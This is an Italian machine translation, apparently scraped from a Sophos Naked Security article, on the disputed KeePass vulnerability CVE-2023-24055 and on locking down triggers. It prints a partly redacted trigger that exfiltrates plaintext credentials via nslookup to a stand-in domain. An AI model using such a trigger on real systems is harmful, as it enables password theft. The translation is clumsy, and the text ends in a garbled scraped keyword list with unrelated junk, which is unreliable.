Sono state alcune settimane degne di nota per i gestori di password, quelle utili utilità che ti aiutano a trovare una password diversa per ogni sito Web che utilizzi e quindi a tenerne traccia.
Alla fine del 2022, è stata la volta di LastPass a fare notizia, quando la società ha finalmente ammesso che una violazione subita nell'agosto 2022 si è effettivamente conclusa con la password dei clienti i caveau vengono rubati dal servizio cloud in cui è stato eseguito il backup.
(Le password stesse non sono state rubate, perché i depositi erano crittografati e LastPass non aveva copie della "chiave principale" di nessuno per i file del deposito di backup stessi, ma è stata una rasatura più ravvicinata di quanto la maggior parte delle persone fosse felice di sentire.)
Poi è stato il turno di LifeLock di essere su tutti i notiziari, quando la società ha avvertito di quello che sembrava uno sfogo attacchi per indovinare la password, probabilmente basata su password rubate da un sito web completamente diverso, forse qualche tempo fa, e magari acquistate sul dark web di recente.
Lo stesso LifeLock non era stato violato, ma alcuni dei suoi utenti sì, grazie al comportamento di condivisione delle password causato da rischi che forse non ricordavano nemmeno di aver corso.
Anche i concorrenti 1Password e BitWarden sono stati recentemente nelle notizie, sulla base di segnalazioni di annunci dannosi, apparentemente inconsapevolmente trasmessi da Google, che attiravano in modo convincente gli utenti a replicare le pagine di accesso volte al phishing dei dettagli del loro account.
Ora tocca a KeePass nelle notizie, questa volta per l'ennesimo problema di sicurezza informatica: un presunto vulnerabilità, il termine gergale utilizzato per i bug del software che portano a falle nella sicurezza informatica che gli aggressori potrebbero essere in grado di sfruttare per scopi malvagi.
Lo sniffing delle password reso facile
Ci riferiamo ad esso come a vulnerabilità qui perché ha un identificatore di bug ufficiale, emesso dal National Institute for Standards and Technology degli Stati Uniti.
Il bug è stato doppiato CVE-2023-24055: L'attaccante che ha accesso in scrittura al file di configurazione XML [può] ottenere le password in chiaro aggiungendo un trigger di esportazione.
L'affermazione sulla possibilità di ottenere password in chiaro, sfortunatamente, è vera.
Se ho accesso in scrittura ai tuoi file personali, incluso il cosiddetto %APPDATA%
directory, posso modificare furtivamente la sezione di configurazione per modificare le impostazioni di KeePass che hai già personalizzato o per aggiungere personalizzazioni se non hai consapevolmente modificato nulla...
...e posso sorprendentemente facilmente rubare le tue password in chiaro, sia in blocco, ad esempio scaricando l'intero database come file CSV non crittografato, sia mentre le usi, ad esempio impostando un "hook di programma" che si attiva ogni volta che accedi a un password dal database.
Nota che non ho bisogno Amministratore privilegi, perché non ho bisogno di pasticciare con la directory di installazione effettiva in cui viene archiviata l'app KeePass, che in genere è vietata agli utenti normali
E non ho bisogno di accedere a nessuna configurazione globale bloccata.
È interessante notare che KeePass fa di tutto per impedire che le tue password vengano intercettate quando le usi, incluso l'uso di tecniche di protezione dalle manomissioni per fermare vari trucchi anti-keylogger anche da parte di utenti che hanno già poteri di amministratore di sistema.
Ma il software KeePass rende anche sorprendentemente facile acquisire i dati delle password in chiaro, forse in modi che potresti considerare "troppo facili", anche per i non amministratori.
È stato un lavoro di un minuto utilizzare la GUI di KeePass per creare un file grilletto event da eseguire ogni volta che copi una password negli appunti e per impostare quell'evento in modo che esegua una ricerca DNS che includa sia il nome utente che la password in chiaro in questione:
Potremmo quindi copiare l'impostazione XML non particolarmente ovvia per quell'opzione dal nostro file di configurazione locale nel file di configurazione di un altro utente sul sistema, dopodiché anche loro scoprirebbero che le loro password sono trapelate su Internet tramite ricerche DNS.
Anche se i dati di configurazione XML sono ampiamente leggibili e informativi, KeePass utilizza curiosamente stringhe di dati casuali note come GUID (abbreviazione di identificatori univoci globali) per indicare i vari grilletto impostazioni, in modo che anche un utente ben informato avrebbe bisogno di un ampio elenco di riferimenti per dare un senso a quali trigger sono impostati e come.
Ecco come appare il nostro trigger di perdita DNS, anche se abbiamo redatto alcuni dettagli in modo che tu non possa fare danni immediati semplicemente copiando e incollando direttamente questo testo:
XXXXXXXXXXXXXXXXXXXXX copia Ruba roba tramite ricerche DNS XXXXXXXXXXXXXXXXXXXXX 0XXXXXXXXXXXXXXXXXXXXX nslookup XXXXXX.XXXXX.blah.prova VERO 1
Con questo trigger attivo, l'accesso a una password KeePass fa trapelare il testo in chiaro in una ricerca DNS discreta su un dominio di mia scelta, che è blah.test
in questo esempio.
Si noti che gli aggressori nella vita reale quasi certamente confonderebbero o offuscherebbero il testo rubato, il che non solo renderebbe più difficile individuare quando si verificano fughe di DNS, ma si prenderebbe cura anche delle password contenenti caratteri non ASCII, come lettere accentate o emoji, che non possono essere altrimenti utilizzati nei nomi DNS:
Ma è davvero un bug?
La domanda delicata, tuttavia, è, "È davvero un bug o è solo una potente funzionalità che potrebbe essere abusata da qualcuno che avrebbe già bisogno di almeno tanto controllo sui tuoi file privati quanto te stesso?"
In poche parole, è una vulnerabilità se qualcuno che ha già il controllo del tuo account può interferire con i file a cui il tuo account dovrebbe essere comunque in grado di accedere?
Anche se potresti sperare che un gestore di pssword includa molti livelli extra di protezione dalle manomissioni per rendere più difficile l'abuso di bug/funzionalità di questo tipo, dovresti CVE-2023-24055 essere davvero una vulnerabilità elencata CVE?
In tal caso, non comandi come DEL
(eliminare un file) e FORMAT
devono essere anche "insetti"?
E non sarebbe l'esistenza stessa di PowerShell, che rende il comportamento potenzialmente pericoloso molto più facile da provocare (prova powerhsell get-clipboard
, per esempio), essere una vulnerabilità tutta sua?
Questa è la posizione di KeePass, riconosciuta dal seguente testo che è stato aggiunto al dettaglio "bug". sul sito web del NIST:
** CONTESTATO ** […] NOTA: la posizione del fornitore è che il database delle password non è destinato a essere protetto contro un utente malintenzionato che ha quel livello di accesso al PC locale.
Cosa fare?
Se sei un utente KeePass autonomo, puoi verificare la presenza di Trigger canaglia come il "DNS Stealer" che abbiamo creato sopra aprendo l'app KeePass e esaminando il Strumenti > Trigger… finestra:
Si noti che è possibile trasformare l'intero grilletto sistema spento da questa finestra, semplicemente deselezionendo il file [ ] Enable trigger system
opzione…
… ma questa non è un'impostazione globale, quindi può essere riattivata tramite il tuo file di configurazione locale, e quindi ti protegge solo dagli errori, piuttosto che da un utente malintenzionato con accesso al tuo account.
Puoi forzare l'opzione disattivata per tutti sul computer, senza possibilità per loro di riattivarla da soli, modificando il file globale di "blocco" KeePass.config.enforced.XML
, che si trova nella directory in cui è installato il programma dell'app stesso.
I trigger verranno disattivati per tutti se il tuo file di imposizione XML globale ha il seguente aspetto:
falso
(Nel caso ve lo stiate chiedendo, un utente malintenzionato che ha accesso in scrittura alla directory dell'applicazione per annullare questa modifica avrebbe quasi certamente abbastanza potenza a livello di sistema per modificare il file eseguibile KeePass stesso o per installare e attivare comunque un keylogger autonomo.)
Se sei un amministratore di rete incaricato di bloccare KeePass sui computer dei tuoi utenti in modo che sia ancora abbastanza flessibile da aiutarli, ma non abbastanza flessibile da consentire loro di aiutare i criminali informatici per errore, ti consigliamo di leggere il KeePass Problemi di sicurezza pagina, il Trigger pagina, e il Configurazione applicata .
- Distribuzione di contenuti basati su SEO e PR. Ricevi amplificazione oggi.
- Platoblockchain. Web3 Metaverse Intelligence. Conoscenza amplificata. Accedi qui.
- Fonte: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- capace
- WRI
- sopra
- Assoluta
- accesso
- Accedendo
- Il mio account
- attivo
- aggiunto
- ammesso
- Ads - Annunci
- Dopo shavasana, sedersi in silenzio; saluti;
- contro
- Tutti
- presunta
- già
- ed
- Un altro
- App
- Applicazioni
- AGOSTO
- autore
- auto
- precedente
- Backed
- background-image
- di riserva
- basato
- perché
- essendo
- sistema
- Parte inferiore
- violazione
- Insetto
- bug
- catturare
- che
- Custodie
- ha causato
- cause
- centro
- certamente
- il cambiamento
- caratteri
- dai un'occhiata
- scegliere
- rivendicare
- più vicino
- Cloud
- colore
- Venire
- azienda
- completamente
- computer
- computer
- condizioni
- Configurazione
- Prendere in considerazione
- di controllo
- copie
- potuto
- coprire
- creare
- creato
- CVE
- i criminali informatici
- Cybersecurity
- Pericoloso
- Scuro
- Web Scuro
- dati
- Banca Dati
- dettagli
- DID
- diverso
- direttamente
- Dsiplay
- dns
- dominio
- Dont
- giù
- soprannominato
- più facile
- facilmente
- o
- crittografato
- applicazione
- abbastanza
- Intero
- Anche
- Evento
- Ogni
- tutti
- esempio
- Sfruttare
- export
- estensivo
- extra
- caratteristica
- pochi
- Compila il
- File
- Infine
- Trovate
- flessibile
- i seguenti
- forza
- essere trovato
- da
- ottenere
- ottenere
- globali
- va
- a portata di mano
- contento
- avendo
- altezza
- Aiuto
- qui
- Fori
- speranza
- librarsi
- Come
- Tuttavia
- HTML
- HTTPS
- identificatore
- immediato
- in
- includere
- incluso
- Compreso
- informativo
- install
- esempio
- Istituto
- Internet
- problema
- Rilasciato
- IT
- stessa
- gergo
- mantenere
- conosciuto
- maggiormente
- LastPass
- galline ovaiole
- portare
- perdita
- Perdite
- Livello
- Lista
- locale
- guardò
- SEMBRA
- ricerca
- fatto
- make
- FA
- direttore
- I gestori
- Margine
- max-width
- forza
- errore
- errori
- modificare
- maggior parte
- nomi
- il
- Bisogno
- Rete
- notizie
- nista
- normale
- ottenere
- ufficiale
- apertura
- Opzione
- altrimenti
- proprio
- parametro
- Password
- Le password
- Paul
- PC
- Persone
- Forse
- cronologia
- phishing
- plaintext
- Platone
- Platone Data Intelligence
- PlatoneDati
- posizione
- Post
- potenzialmente
- energia
- potente
- potenze
- PowerShell
- un bagno
- privilegi
- probabilmente
- Programma
- acquistati
- fini
- metti
- domanda
- casuale
- eruzione cutanea
- Lettura
- recentemente
- raccomandare
- Basic
- ricorda
- replica
- Segnalati
- Report
- invertire
- rischi
- Correre
- Sezione
- sicuro
- senso
- servizio
- set
- regolazione
- impostazioni
- Corti
- dovrebbero
- semplicemente
- So
- Software
- solido
- alcuni
- Qualcuno
- Spot
- standalone
- standard
- Ancora
- rubare
- Fermare
- memorizzati
- tale
- suppone
- SVG
- sistema
- Fai
- tecniche
- Tecnologia
- Il
- loro
- si
- perciò
- Attraverso
- tempo
- a
- pure
- top
- pista
- transizione
- trasparente
- innescare
- vero
- TURNO
- Turned
- tipicamente
- unico
- URL
- us
- uso
- Utente
- utenti
- utilità
- vario
- Volta
- volte
- via
- vulnerabilità
- W3
- modi
- sito web
- Sito web
- Settimane
- Che
- quale
- OMS
- volere
- chiedendosi
- Lavora
- sarebbe
- scrivere
- XML
- Trasferimento da aeroporto a Sharm
- te stesso
- zefiro